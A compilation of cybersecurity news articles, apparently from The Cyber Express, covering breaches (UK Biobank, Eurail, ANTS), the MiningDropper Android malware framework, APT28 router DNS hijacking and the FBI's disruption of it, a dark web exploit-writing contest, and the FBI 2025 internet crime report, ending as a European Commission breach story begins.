In this week’s edition of The Cyber Express weekly roundup, we explore the latest developments in the world of cybersecurity, focusing on high-profile data breaches, growing malware campaigns, and law enforcement actions against cybercriminals.   As the digital threat landscape continues to evolve, attackers are targeting sensitive personal and organizational data, from health records to financial credentials. Meanwhile, government regulators are ramping efforts to protect minors and combat harmful content on social platforms, while cybercriminals continue to exploit vulnerabilities in both public and private sectors.  This weekly roundup highlights how various industries, from healthcare and social media to finance and government, are grappling with rising threats, making it clear that the intersection of data security, regulation, and cybercrime is more critical than ever.  

The Cyber Express Weekly Roundup 

UK Biobank Data Breach Triggers Urgent Review of Data Security Measures 

A significant data breach at the UK Biobank has raised major concerns over the security of health-related data used in scientific research. In April 2026, de-identified participant information was discovered being sold on a Chinese consumer platform, sparking widespread alarm among the research community. Read more... 

Vercel CEO Reveals Expansion of Malware Campaign Affecting Multiple Targets 

Vercel's CEO, Guillermo Rauch, confirmed that the recent breach involving Context.ai was part of a much larger malware campaign affecting multiple targets. Following a review of network logs, Vercel’s security team uncovered evidence of malware distribution that compromised several customer accounts, including access to valuable Vercel account keys. Read more... 

Ofcom Investigates Telegram and Teen Platforms 

In the UK, Ofcom has launched an investigation into Telegram and several popular teen chat platforms, such as Teen Chat and Chat Avenue, after reports surfaced of online grooming and child sexual abuse material (CSAM) on these services. Under the Online Safety Act, platforms are required to take proactive steps to prevent harmful content and protect minors from exploitation. Read more... 

Personal Data Exposed in Breach of France’s ANTS Portal 

A recent breach of France’s ANTS (Agence Nationale des Titres Sécurisés) portal has compromised personal data, including names, email addresses, and birthdates, although no documents or sensitive attachments were affected. The breach, which occurred on April 15, 2026, raises significant concerns about identity theft and phishing risks, as the exposed data could be used to target individuals. Read more... 

Bluesky Faces Coordinated DDoS Attack 

Bluesky, the rapidly expanding social media platform, suffered a major disruption on April 15, 2026, when it was targeted by a sophisticated distributed denial-of-service (DDoS) attack. The attack caused widespread outages, impacting core platform functions such as user feeds, notifications, and search capabilities. Read more... 

Indian Authorities Arrest Key SIM Card Supplier in Cyber Fraud Crackdown 

India’s Central Bureau of Investigation (CBI) has arrested a key conspirator in a major cyber fraud operation as part of Operation Chakra-V. The suspect, arrested in Guwahati, is accused of supplying fraudulent SIM cards used in various cybercrime schemes, including extortion and fake loan scams. The SIM cards were acquired using fake identities and distributed to cybercriminal networks. Read more... 

Weekly Takeaway 

This week’s roundup highlights the diverse and evolving nature of cyber threats. From the exposure of sensitive health data and sophisticated malware campaigns to DDoS attacks and SIM card fraud schemes, the cybersecurity landscape remains fraught with challenges. Regulatory bodies and companies alike continue to grapple with emerging risks, particularly in sectors like public health data, social media platforms, and digital content safety. As these incidents unfold, it’s clear that both technical vulnerabilities and human factors, such as social engineering, continue to be central targets for attackers.  With regulatory frameworks like the Online Safety Act and increased investigative efforts in places like India and France, the pressure on platforms and authorities to act quickly and decisively is higher than ever. As the cyber threat landscape becomes more interconnected, the need for enhanced security protocols, improved monitoring, and greater accountability in digital spaces remains critical. 

A newly issued cybersecurity advisory highlights an evolution in the tactics, techniques and procedures (TTPs) employed by China-Nexus threat actors. The report, released with support from the UK Cyber League and coordinated by the National Cyber Security Centre (NCSC-UK) alongside international partners, sheds light on how Chinese threat actors are relying on large-scale covert networks of compromised devices to conduct malicious cyber operations.

A Strategic Shift in China-Nexus TTPs 

In recent years, cybersecurity experts have observed a clear transition in China-Nexus TTPs. Rather than relying on dedicated, individually controlled infrastructure, Chinese threat actors are now leveraging expansive networks of compromised devices, commonly referred to as covert networks or botnets. These networks are primarily composed of Small Office/Home Office (SOHO) routers, Internet of Things (IoT) devices, and other internet-connected hardware. According to the advisory, the majority of China-Nexus actors are believed to be using such covert networks, with multiple networks operating simultaneously and often shared among different groups. These networks are continuously updated, making them highly adaptable and difficult to track. Any organization targeted by Chinese threat actors could be affected. For example, the group known as Volt Typhoon has used these covert networks to pre-position cyber capabilities within critical infrastructure, while Flax Typhoon leveraged similar methods for espionage operations.

How Covert Networks Operate 

Although botnets are not new, China-Nexus actors are now deploying them at an unprecedented scale and with strategic intent. These covert networks allow attackers to mask their identity, route malicious traffic through multiple nodes, and reduce the risk of attribution. Typically, an attacker accesses the network via an entry point, or “on-ramp,” and routes activity through numerous compromised devices—called traversal nodes—before exiting near the target. This multi-hop approach obscures the origin of the attack. These networks support every stage of a cyber operation, from reconnaissance and scanning to malware delivery, command-and-control communication, and data exfiltration. They are also used for general browsing, enabling threat actors to research vulnerabilities and refine TTPs without revealing their identity. The presence of legitimate users on some networks further complicates attribution. 

Real-World Examples and Scale 

Evidence suggests that some covert networks used by China-Nexus actors are developed and maintained by Chinese cybersecurity firms. One notable example is the “Raptor Train” network, which infected over 200,000 devices globally in 2024. It was reportedly managed by Integrity Technology Group, a company also linked by the FBI to activities associated with Flax Typhoon. Another example includes the KV Botnet used by Volt Typhoon, which primarily exploited outdated Cisco and NetGear routers. These devices were particularly vulnerable because they had reached “end-of-life” status, meaning they no longer received security updates. The scale and adaptability of these networks present a major challenge. As Paul Chichester, NCSC Director of Operations, stated: “Botnet operations represent a significant hreat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyberattacks.”

Challenges for Network Defenders 

Cybersecurity researchers have long been aware of such threats, but the evolving nature of China-Nexus TTPs introduces new difficulties. A key issue identified by Mandiant Intelligence in May 2024 is “indicator of compromise (IOC) extinction.” Traditional defenses, such as static IP blocklists, are becoming less effective because attackers can operate from vast, constantly changing pools of devices.  As compromised nodes are patched or removed, new ones are quickly added, making these networks highly dynamic. This fluidity undermines conventional detection and mitigation strategies. 

Defensive Measures and Best Practices 

The advisory outlines several steps organizations can take to defend against China-Nexus covert networks: 

For all organizations: 

• Maintain a clear inventory of network edge devices. 

• Establish baselines for normal network activity, particularly VPN access. 

• Monitor for unusual connections, including those from consumer broadband ranges. 

• Use dynamic threat intelligence feeds. 

• Implement multi-factor authentication for remote access. 

For higher-risk organizations: 

• Use IP allow lists instead of blocklists for VPN access. 

• Apply geographic and behavioral profiling of incoming connections. 

• Adopt zero-trust security models. 

• Enforce SSL machine certificates. 

• Reduce exposure of internet-facing systems. 

• Explore machine learning tools to detect anomalies. 

For the most at-risk entities: 

• Treat China-Nexus covert networks as advanced persistent threats (APTs). 

• Conduct active threat hunting for suspicious IP activity. 

• Map and monitor known covert networks using threat intelligence. 

In this week’s weekly roundup, The Cyber Express reviews major developments across the cybersecurity domain. highlighting incidents involving crypto ecosystem attacks, state-linked fraud operations, regulatory scrutiny, and underground cybercrime activity. The broader threat landscape continues to show attackers targeting infrastructure weaknesses, social engineering pathways, and third-party dependencies rather than isolated technical flaws.  Across multiple cases, state-aligned and financially motivated actors are focusing on routers, DNS layers, and decentralized systems to intercept data and manipulate transactions. At the same time, gaps in regulation and enforcement continue to complicate platform accountability, particularly in online safety and digital content governance.  

The Cyber Express Weekly Roundup 

$15M Grinex Hack Halts Trading After Wallet Breach 

Grinex suspended trading and withdrawals following a coordinated attack that compromised its wallet infrastructure, resulting in the theft of more than $15 million in USDT. The attackers rapidly moved assets across Ethereum and Tron networks, using chain-hopping and layering techniques to obscure transaction trails and avoid detection. Read more... 

Two U.S. Nationals Sentenced in $5M North Korea IT Worker Scheme 

Two U.S. nationals, Kejia Wang and Zhenxing Wang, received prison sentences of 108 and 92 months for their roles in a North Korea-linked remote employment scheme that generated over $5 million. The operation used stolen identities, domestic “laptop farms,” and shell companies to present overseas workers as U.S.-based employees across more than 100 companies. Read more... 

Australia Social Media Ban Faces Enforcement Questions 

Australia’s under-16 social media restriction is facing renewed scrutiny after a study of 1,050 children found that over 60% of previously active users aged 12–15 continue accessing platforms such as TikTok, YouTube, and Instagram. Many accounts remained active without intervention from providers, and in some cases, users created new profiles after restrictions were applied. Read more... 

TierOne Dark Web Contest Offers $10K for Exploit Writeups 

A dark web forum known as TierOne has launched a $10,000 contest encouraging detailed technical write-ups on vulnerability exploitation techniques. Running from April 13 to May 14, 2026, and reportedly sponsored by a ransomware group, the contest focuses on topics such as remote code execution, IDOR, SSTI, firmware attacks, and EDR bypass methods.  Read more... 

Rockstar Cyberattack Confirmed Amid Extortion Threat 

Rockstar Games confirmed a cyberattack involving unauthorized access through a third-party service, though it stated that core operations and player systems were unaffected. The threat actor group ShinyHunters claimed responsibility, alleging access to internal company data and demanding payment by April 14, 2026, under threat of public release. Read more... 

Weekly Takeaway 

The Cyber Express weekly roundup reflects a threat landscape that is fragmented yet interconnected. From multimillion-dollar crypto thefts and criminal employment schemes to underground exploit markets and extortion-driven breaches, attackers are consistently blending technical exploitation with deception and supply chain targeting.   Regulatory uncertainty and weak enforcement mechanisms further amplify these risks, allowing both state-linked and financially motivated actors to operate with greater flexibility across digital environments. 

Researchers have uncovered an Android malware framework dubbed the MiningDropper. Security researchers at Cyble Research and Intelligence Labs (CRIL) have identified a sharp increase in campaigns using MiningDropper, a modular platform capable of distributing multiple types of malicious payloads, including cryptocurrency miners, infostealers, Remote Access Trojans (RATs), and banking malware.   A notable aspect of this campaign is its abuse of the open-source Lumolight application, which has been repurposed as a trojanized entry point. 

A Modular Android Malware Framework at Scale

MiningDropper is not a conventional malware strain. Instead, it operates as a multi-stage delivery framework designed to evade detection and dynamically deploy payloads. Its architecture integrates XOR-based obfuscation, AES-encrypted payload staging, dynamic DEX loading, and anti-emulation techniques. These layers collectively delay analysis and reduce the likelihood of detection by traditional antivirus solutions.  Over 1,500 MiningDropper samples have been observed in the wild within a single month, with more than 50% showing minimal antivirus detection. Notably, around 668 samples registered only three antivirus detections, indicating widespread distribution with low visibility. 

Lumolight as the Initial Infection Vector 

A recent variant of MiningDropper uses a trojanized version of Lumolight as its initial payload. Victims unknowingly install this compromised application through phishing links, fraudulent websites, or social media campaigns. Once installed, the malicious application triggers a native library, “librequisitionerastomous.so”, which begins the execution chain. This native layer decrypts XOR-obfuscated strings at runtime and checks whether the app is running in an emulator or rooted environment. If such conditions are detected, the malware halts execution to avoid analysis. Otherwise, it proceeds to decrypt and load the first-stage payload from the app’s assets. 

Multi-Stage Payload Delivery Mechanism 

[caption id="" align="aligncenter" width="909"] MiningDropper attack chain (Source: Cyble)[/caption] MiningDropper’s infection chain unfolds across multiple stages: 

• Initial Stage: The native code decrypts an embedded asset using a hardcoded XOR key, producing a DEX file. This file is dynamically loaded using DexClassLoader and executes a bootstrap component. 
• First Stage: The bootstrap loader decrypts a second-stage payload using AES encryption. The AES key is derived from the SHA-1 hash of the file name, making it harder for analysts to extract static keys. 
• Second Stage: This stage presents a fake Google Play update interface, a social engineering tactic designed to maintain user trust. Behind the scenes, it decrypts additional payloads and configuration files. The malware can operate in two modes: a cryptocurrency miner or a user-defined malicious payload. 

Configuration files such as “norweyanlinkediting” (miner path) and “udela” (user payload path) dictate the behavior. These configurations include parameters like remote control capabilities, payload splits, and subscription timelines. 

• Third Stage: The malware extracts a ZIP archive containing further DEX files and native libraries. Acting as a split-APK installer, it reconstructs and installs the final payload based on the configuration. 

Campaigns Targeting Multiple Regions 

CRIL identified two primary campaign clusters leveraging MiningDropper: 

• Infostealer Campaign (India): This campaign targets Indian users by impersonating trusted entities such as Regional Transport Office (RTO) services, banks, telecom providers, and popular apps. In October 2025, a campaign using RTO-themed lures distributed malicious APK files that ultimately deployed infostealers to harvest sensitive financial and personal data. 
• BTMOB RAT Campaign (Global): Another campaign distributes MiningDropper across Europe, Latin America, and Asia. In this case, the final payload is BTMOB RAT, a powerful Android trojan first identified in February 2024 as a variant of SpySolr malware. It supports credential theft, real-time remote control, device takeover, and financial fraud operations. 

Interestingly, while BTMOB RAT was initially distributed without obfuscation and detected by multiple antivirus engines, its integration with MiningDropper has reduced detection rates to as low as one to three engines. 

Final Payload Capabilities 

The final payload delivered by MiningDropper depends on the configuration: 

• Infostealers: Extract sensitive data such as login credentials and financial information.
• RATs (e.g., BTMOB RAT): Enable full device compromise, including screen monitoring, file access, audio recording, and command execution via WebSocket-based communication.
• Banking Trojans: Facilitate financial fraud through credential harvesting and transaction manipulation. 
• Cryptocurrency Miners: Utilize device resources for unauthorized mining operations.

The malware also abuses Android Accessibility Services to gain extensive control over infected devices, allowing it to simulate user interactions and grant additional permissions. 

A Scalable Malware-as-a-Framework Model 

MiningDropper demonstrates a shift toward malware frameworks that prioritize scalability and adaptability. Its ability to switch between payloads using configuration changes, without altering the core architecture, makes it highly reusable across campaigns. This modularity enables threat actors to rapidly expand operations while maintaining low detection rates.  MiningDropper is more than just another Android malware strain. By combining advanced obfuscation, multi-stage execution, and the exploitation of legitimate projects like Lumolight, it represents a threat model capable of sustaining large-scale, global campaigns.

In an unusual development within the underground cyber world, a dark web article contest has been announced on a well-known dark web forum, TierOne forum. The initiative is backed by a $10,000 prize pool. The contest places a spotlight on technical writing centered around vulnerability exploitation, offering insight into how knowledge is shared and rewarded in these spaces.  Traditionally, dark web forums have been linked to illicit activities such as trading stolen data, coordinating ransomware attacks, and distributing malware. However, this contest introduces a different dynamic, one that mirrors legitimate cybersecurity ecosystems, where researchers document findings and share exploit techniques.  

The Dark Web Article Contest Overview and Prize Structure 

According to an official announcement shared by an administrator on the forum, the post states: “Всем привет! Мы рады сообщить T1 erone [КОНКУРС СТАТЕЙ #1 - 2026]. Победители конкурса получают призы: 1 место 5.000$, 2 место - 3.000$, 3 место - 2.000$, [Призовой фонд 10.000$]. Прием статей начинается 13.04.2026 и заканчивается 14.05.2026.”   The announcement indicates that the dark web article contest will run from April 13, 2026, to May 14, 2026, with prize amounts set at $5,000 for first place, $3,000 for second place, and $2,000 for third place, making up a total prize pool of $10,000, reportedly sponsored by the ransomware group cry0. 

Topics Focused on Vulnerability Exploitation 

The contest invites submissions covering a wide range of advanced topics related to vulnerability exploitation with real-world applicability. These include: 

• Remote Code Execution (RCE) through deserialization flaws in React and Node.js frameworks. 
• Command injection attacks in APIs and backend systems. 
• Insecure Direct Object Reference (IDOR) vulnerabilities in SaaS platforms. 
• Server-Side Template Injection (SSTI) in modern templating engines. 
• Exploitation of insecure deserialization in PHP and Java. 
• Client-side RCE via Markdown or Office file rendering. 
• Firmware attacks targeting routers and cameras. 
• Privilege escalation techniques in RouterOS and similar systems. 
• Exploitation methods for products from Cisco, MikroTik, Oracle, and Ubiquiti. 
• Zero-day discovery in browser components like WebGPU and Blink. 
• AI-assisted vulnerability discovery and reverse engineering. 
• Techniques for bypassing AV and EDR security systems. 
• Exploitation of Remote Procedure Call (RPC) mechanisms. 

For context, vulnerabilities such as RCE, IDOR, and SSTI allow attackers to execute arbitrary code or access restricted data, while firmware attacks enable persistent control over hardware devices. Similarly, AV/EDR bypass techniques are designed to evade detection by modern security solutions. 

Participation Rules and Requirements 

The TierOne forum has outlined strict guidelines for participants. Articles must be published within the forum’s designated section and include a specific prefix to qualify: 

• Submissions must be posted under the Articles section with the prefix “[Contest]”. 
• A link to the article must be shared in the contest thread with a participation note. 
• All users are eligible, regardless of registration date or activity level. 
• The use of multiple accounts is strictly prohibited. 

In addition, the contest enforces content quality standards: 

• Articles must be original and based on the author’s own experience. 
• Copy-pasted or reposted material is not allowed. 
• Submissions should comprehensively cover the chosen topic, including tools, techniques, and methodologies. 
• Minimum length requirement is at least one A4 page. 
• Excessive filler content is discouraged. 
• Including video demonstrations may improve chances of winning. 

A Glimpse into Dark Web Knowledge Sharing 

While the existence of such a contest may seem surprising, it notes a bigger trend within dark web forums. Beyond illegal marketplaces and data trading, these platforms also function as hubs for technical exchange, where members document and refine vulnerability exploitation techniques. In many ways, the structure resembles legitimate bug bounty programs and penetration testing workflows, where cybersecurity professionals publish detailed reports on discovered flaws. The key difference lies in the intent and environment in which this knowledge is applied. It is important to note that this article does not endorse participation in such activities. Instead, it aims to shed light on how these underground ecosystems operate. The TierOne forum contest highlights that even within the dark web, there are organized efforts to produce structured, experience-based technical content, albeit in a context that raises ethical and legal concerns.

The rise of SOHO router compromise campaigns has exposed a critical weakness in global network security, particularly as threat actors like Forest Blizzard continue to exploit poorly secured home and small-office devices.   According to security researchers, this Russia-linked group has been systematically targeting vulnerable routers since at least August 2025, transforming them into covert infrastructure for surveillance and follow-on cyberattacks.  

Forest Blizzard and the Expanding SOHO Router Compromise Campaign 

Forest Blizzard, a threat actor associated with Russian military intelligence and tracked in part as Storm-2754, has conducted widespread exploitation of SOHO devices. By leveraging the SOHO router compromise, the group has successfully hijacked Domain Name System (DNS) requests, allowing it to passively monitor and collect network traffic at scale.  Microsoft identified more than 200 organizations and over 5,000 consumer devices impacted by this malicious DNS infrastructure. Notably, telemetry showed no compromise of Microsoft-owned systems. However, the breadth of affected networks highlights the campaign’s reach and the effectiveness of targeting edge devices that often lack strong monitoring or security controls.  For actors like Forest Blizzard, DNS hijacking provides persistent and low-visibility access to sensitive data flows. By positioning themselves upstream of enterprise environments, attackers can observe and potentially manipulate traffic without directly breaching corporate systems. 

How SOHO Router Compromise Leads to DNS Hijacking 

After gaining access to vulnerable routers, Forest Blizzard alters their default configurations to use attacker-controlled DNS resolvers. This manipulation causes connected devices to unknowingly send DNS queries to malicious servers.  Most endpoint devices rely on routers for network configuration via the Dynamic Host Configuration Protocol (DHCP). Once a router is compromised, all connected devices inherit the malicious DNS settings. This makes the SOHO router a compromise, an efficient and scalable attack vector.  The group is believed to use the legitimate dnsmasq utility to handle DNS queries. While dnsmasq is commonly used in home networking for DNS forwarding and DHCP services, in this context, it enables attackers to intercept, log, and respond to DNS requests while maintaining the appearance of normal operations. 

Forest Blizzard’s Use of Adversary-in-the-Middle Attacks 

Beyond passive surveillance, Forest Blizzard has extended its SOHO router compromise operations to support adversary-in-the-middle (AiTM) attacks. These attacks specifically target Transport Layer Security (TLS) connections, enabling interception of sensitive communications.  In most cases, DNS traffic is transparently proxied, allowing users to connect to legitimate services without disruption. However, in select high-value scenarios, the attackers spoof DNS responses for targeted domains. This redirects victims to malicious infrastructure controlled by Forest Blizzard.  Once redirected, victims may encounter invalid TLS certificates mimicking legitimate services such as Outlook on the web. If users ignore certificate warnings, attackers can intercept plaintext data within the encrypted session. This may include emails and other sensitive cloud-hosted content.  Researchers observed two notable AiTM scenarios: 

• Attacks on Microsoft 365 domains, particularly Outlook on the web.  
• Targeted operations against government servers in at least three African countries, where DNS interception enabled further data collection.  

Mitigation Strategies Against Forest Blizzard Threats 

To counter risks associated with SOHO router compromise, researchers recommend several defensive measures. For DNS protection, organizations should enforce domain-based access controls using Zero Trust DNS (ZTDNS), block malicious domains, and maintain detailed DNS logs to detect anomalies. Enabling network and web protection features in Microsoft Defender for Endpoint further strengthens defenses.  Equally critical is addressing identity security. Centralizing identity management, enforcing multifactor authentication (MFA), and applying Conditional Access policies can reduce the impact of credential theft from AiTM attacks. It is also advised to adopt passwordless solutions such as passkeys and restrict authentication to trusted devices and locations. 

The Eurail data breach has exposed personal information of approximately 308,777 individuals in the United States, according to a disclosure by Eurail B.V., the Netherlands-based company that manages the official online sales platform for Eurail and Interrail rail passes. Among those affected are 242 residents of New Hampshire. The Eurail data breach occurred between late December 2025 and early January 2026, when an unauthorized actor gained access to Eurail’s network and transferred files. The company identified the issue after detecting unusual activity within its systems and later confirmed the exposure of personal data.

Eurail Data Breach Timeline and Response

Following the detection of suspicious activity, Eurail activated its incident response procedures and initiated an investigation with third-party cybersecurity experts. Law enforcement was also notified and is continuing to investigate the incident. According to the company, the unauthorized access took place on December 26, 2025, when files were transferred from its network. The investigation concluded that these files contained personal information, with the final determination made on February 25, 2026. Eurail began notifying affected individuals and state authorities on March 27, 2026, reporting the breach to attorneys general in California, New Hampshire, Oregon, and Vermont. A public notice was also issued on the European Youth Portal.

Information Compromised in the Eurail Data Breach

The company confirmed that the Eurail data breach involved sensitive personal information, including:

• Names
• Passport numbers

While this represents the confirmed data for U.S. individuals, earlier findings suggest that the broader impact may be more extensive. Previous disclosures linked to the incident indicated that additional data types were compromised, including financial and health-related information.

Broader Exposure Linked to Eurail Data Breach

Earlier this year, Eurail confirmed that data from a prior breach was being offered for sale on the dark web, with samples appearing on Telegram. This development suggested that the incident extended beyond initial containment and had evolved into a wider data exposure situation. The earlier dataset reportedly included passport details, bank account IBANs, email addresses, phone numbers, and health information, in addition to names. The combination of such data increases the risk of identity theft, financial fraud, and long-term misuse. The breach is also believed to have affected customers who purchased Eurail or Interrail passes through partner channels, as well as participants in the DiscoverEU program, which issued its own warning that sensitive personal details, including passport copies and financial information, may have been exposed.

Company Measures and Security Actions

In response to the Eurail data breach, the company has taken several steps, including terminating unauthorized access, strengthening internal security measures, and continuing its cooperation with law enforcement and cybersecurity experts. Eurail stated that it takes the protection of customer information seriously and is working to prevent similar incidents in the future. The investigation into the full scope of the breach is ongoing.

What Affected Individuals Should Do

Eurail has advised customers to stay alert to suspicious communications, especially any requests for personal information. Individuals are encouraged not to share sensitive data with unknown or unsolicited contacts claiming to represent the company. The company also recommends that users monitor their financial accounts and review credit reports regularly for any unauthorized activity. In the United States, consumers can obtain a free annual credit report from each of the three major credit bureaus. Those who suspect misuse of their information are advised to contact the Federal Trade Commission, reach out to their state’s attorney general office, and report the matter to local law enforcement.

A Growing Risk Around Travel Data

The Eurail data breach highlights the risks associated with large-scale travel platforms that handle sensitive identity and financial information. With passport numbers and other personal identifiers involved, the exposure can lead to long-term consequences for affected individuals. As investigations continue, the incident reinforces the need for stronger data protection measures and constant monitoring across systems that manage sensitive traveler information.

The Russian-linked threat group APT28 has continued to leverage vulnerable network devices to carry out large-scale DNS hijacking campaigns, enabling adversary-in-the-middle attacks. Recent developments show that these operations have drawn direct intervention from U.S. authorities.  The U.S. Department of Justice and the FBI announced a court-authorized operation to disrupt a network of compromised routers controlled by Russia’s military intelligence unit, widely known as APT28. According to findings aligned with prior reporting from the NCSC, the group has been exploiting routers to intercept communications, harvest credentials, and target individuals and organizations of intelligence interest. 

DNS Hijacking and Adversary-in-the-Middle Tactics 

APT28’s operations include DNS hijacking, a technique that manipulates how domain names are resolved into IP addresses. By altering DNS settings, often at the router level, attackers redirect legitimate traffic through malicious infrastructure. This enables adversary-in-the-middle (AitM) attacks, where victims unknowingly connect to spoofed services. These malicious endpoints are designed to imitate legitimate platforms, allowing attackers to intercept login sessions and extract sensitive data, including passwords, OAuth tokens, and emails. Both the FBI and the NCSC have noted that these attacks can impact browser sessions and desktop applications alike, increasing the scale and effectiveness of credential harvesting.

U.S. Operation Targets APT28 Infrastructure 

The disruption effort, publicly disclosed by the Department of Justice, targeted a network of small office/home office (SOHO) routers compromised by APT28, also known as Fancy Bear, Sofacy, Sednit, STRONTIUM, Forest Blizzard, and Pawn Storm. The group is widely attributed to Russia’s GRU Unit 26165.  Since at least 2024, APT28 actors have exploited known vulnerabilities to gain access to thousands of TP-Link routers globally. After stealing credentials, they modified router configurations to redirect DNS traffic to malicious servers under their control. These operations were initially indiscriminate. However, the attackers implemented automated filtering mechanisms to identify DNS queries of intelligence value. For selected targets, the malicious DNS resolvers returned fraudulent records for domains, particularly those mimicking Microsoft Outlook services, to facilitate adversary-in-the-middle attacks against encrypted traffic.  Through this approach, APT28 was able to harvest unencrypted passwords, authentication tokens, emails, and other sensitive data from devices connected to compromised routers.

Official Statements on the Threat 

U.S. officials described the campaign as both persistent and dangerous. Assistant Attorney General John A. Eisenberg stated, “The GRU’s predatory use of networks in American homes and businesses for its malicious cyber operations remains a serious and persistent threat.”  U.S. Attorney David Metcalf added, “Russian military intelligence once again hijacked Americans’ hardware to commandeer critical data,” emphasizing that the government would continue to respond aggressively to nation-state cyber threats.  FBI officials also stressed the scale of the campaign. Assistant Director Brett Leatherman noted that compromised routers were used globally for espionage, while Special Agent Ted E. Docks highlighted that devices across more than 23 U.S. states had been weaponized. 

How the FBI Disrupted the DNS Hijacking Network 

As part of the court-authorized operation, referred to as Operation Masquerade, the FBI deployed technical measures to neutralize the U.S. portion of APT28’s infrastructure.  According to court documents: 

• The FBI sent commands to compromised routers to collect evidence of APT28 activity. 
• Reset DNS settings, removing malicious resolvers and restoring legitimate ISP configurations.
• Blocked the actors’ ability to regain unauthorized access. 

The operation was carefully tested on affected TP-Link devices to ensure that it did not disrupt normal functionality or collect user content. Importantly, the remediation steps can be reversed by users through factory resets or manual configuration changes. 

Continued Router Exploitation and Infrastructure Tactics 

These developments align closely with earlier findings from the NCSC, which documented how APT28 used Virtual Private Servers (VPSs) as malicious DNS infrastructure. Two main clusters were identified: 

• Cluster One: Focused on modifying DHCP DNS settings in SOHO routers, enabling selective DNS hijacking and adversary-in-the-middle attacks.  
• Cluster Two: Involved forwarding DNS traffic through a layered infrastructure, with some operations targeting high-value devices, including those in Ukraine.  

APT28’s activity has also included exploitation of vulnerabilities such as CVE-2023-50224 in TP-Link routers, allowing attackers to extract credentials and reconfigure DNS settings via crafted HTTP requests.

Targeted Services and Indicators 

APT28’s DNS hijacking campaigns have frequently targeted Microsoft Outlook-related domains, including: 

• autodiscover-s.outlook[.]com  
• imap-mail.outlook[.]com  
• outlook.live[.]com  
• outlook.office[.]com  
• outlook.office365[.]com  

These targets reflect a clear focus on email-based intelligence gathering. Supporting infrastructure includes numerous malicious IP ranges and identifiable server configurations, such as unusual SSH ports and “dnsmasq-2.85” DNS services. 

Mitigation and Security Recommendations 

Both the FBI and the NCSC recommend immediate steps to mitigate risks associated with DNS hijacking and adversary-in-the-middle attacks: 

• Replace end-of-life or unsupported routers  
• Update firmware to the latest available versions  
• Verify DNS settings to ensure they point to legitimate resolvers  
• Disable or secure remote management interfaces  
• Implement firewall rules to limit exposure  
• Enable multi-factor authentication (MFA) to reduce credential abuse  
• Users are also encouraged to monitor their networks and report suspected compromises to appropriate authorities. 

The FBI Internet Crime Report 2025 shows just how expensive cybercrime has become. In 2025, the FBI’s Internet Crime Complaint Center (IC3) received over one million complaints, with reported losses touching $20.8 billion, the highest ever recorded. That figure is not just a statistic. It reflects everyday incidents, individuals losing life savings to investment scams, businesses wiring money to fraudulent accounts, and organizations dealing with disruptions from ransomware attacks. What used to be isolated cases are now happening at scale. The FBI Internet Crime Report 2025 also shows how the nature of cybercrime is changing. Fraud is no longer limited to suspicious emails or obvious scams. Criminals are using social platforms, messaging apps, and now even artificial intelligence to make their operations look legitimate. In many cases, victims don’t realize they are being targeted until the money is already gone. At the same time, the report highlights that law enforcement is trying to keep pace. Operations targeting crypto scams and international fraud networks are making an impact, but the overall trend shows that cybercrime is expanding faster than it is being contained.

Cyber-Enabled Fraud Remains the Biggest Driver

A large share of these losses comes from cyber-enabled fraud, which alone accounts for nearly 85% of the total financial damage, or about $17.7 billion. Investment fraud continues to cause the most damage. In 2025, it led to $8.6 billion in losses, followed by business email compromise (BEC) and tech support scams. Within this, cryptocurrency investment fraud stands out. Losses linked to crypto scams reached $7.2 billion, making it the biggest single category. [caption id="attachment_111088" align="aligncenter" width="577"] Image Source: FBI Report[/caption] These scams are no longer basic phishing attempts. Attackers spend time building trust, approaching victims through social media, messaging apps, or even dating platforms. Once trust is established, victims are guided toward fake investment platforms that show fabricated profits. By the time withdrawals are attempted, the money is gone.

AI-Enabled Scams Are Growing Fast

The FBI Internet Crime Report 2025 includes a separate section on AI-enabled scams for the first time, and the early numbers are already concerning.

• More than 22,000 complaints linked to AI
• Around $893 million in losses

AI is making scams more convincing. Fake profiles, cloned voices, and realistic conversations can now be created quickly and at scale. This allows attackers to run highly targeted campaigns without much effort. The challenge is that these scams often look legitimate, making it harder for individuals and even businesses to identify red flags in time.

Ransomware Continues to Target Critical Sectors

Ransomware remains a steady threat, especially for critical infrastructure.

• Over 3,600 complaints reported in 2025
• Losses crossed $32 million

The actual impact is likely much higher. Many organizations do not report full losses, especially indirect costs like downtime or recovery expenses. The report also notes 63 new ransomware variants identified during the year, showing how quickly these attacks continue to evolve. Sectors such as healthcare, manufacturing, and government facilities remain frequent targets, where even short disruptions can have serious consequences.

FBI Operations Are Preventing Some Losses

The report also highlights efforts by law enforcement to limit the damage. One example is Operation Level Up, focused on cryptocurrency investment scams. Since its launch in 2024, the initiative has helped reduce potential losses by more than $500 million. In many cases, victims did not realize they were being scammed until they were contacted. This reflects a larger issue, many cyber fraud cases go unnoticed until significant financial damage has already occurred.

Cybercrime Is Becoming More Structured

The report also points to broader trends. Cybercriminal groups are operating more like organized businesses. At the same time, state-linked actors are becoming more active, targeting infrastructure and sensitive data. One example highlighted is the DPRK IT worker scam, where individuals posing as remote IT workers gain access to company systems and use that access for data theft or further attacks. These developments show that cybercrime is no longer limited to isolated incidents. It is part of a larger, global ecosystem.

A Growing Gap Between Threats and Preparedness

The FBI Internet Crime Report 2025 shows a clear pattern—cybercrime is scaling faster than awareness and response.

• Fraud tactics are becoming more personal and long-term
• AI is helping attackers improve success rates
• Cryptocurrency is making transactions harder to trace

While recovery efforts and law enforcement actions are improving, most interventions still happen after the damage is done.

Final Take on FBI Internet Crime Report 2025

The FBI Internet Crime Report 2025 highlights a shift in how cybercrime operates today. The scale—over $20 billion in losses—is significant, but the methods behind these numbers are just as important. From cyber-enabled fraud to AI-enabled scams and cryptocurrency investment fraud, attackers are using a mix of technology and human psychology to succeed. For individuals and organizations, the risk is no longer occasional—it is constant, and it is evolving.

The European Commission cloud breach did not begin with a dramatic system hack or a visible outage. It started quietly, with a trusted tool, a routine update, and a single compromised credential. Within days, that was enough to expose nearly 91.7 GB of data and drag multiple EU entities into a widening cybersecurity incident. Disclosed publicly on March 27, the European Commission cloud breach is now being treated as a clear example of how supply-chain attacks are reshaping risk in cloud environments. Not because defenses were absent, but because the entry point looked legitimate.

European Commission Cloud Breach Traced to Compromised Trivy Tool

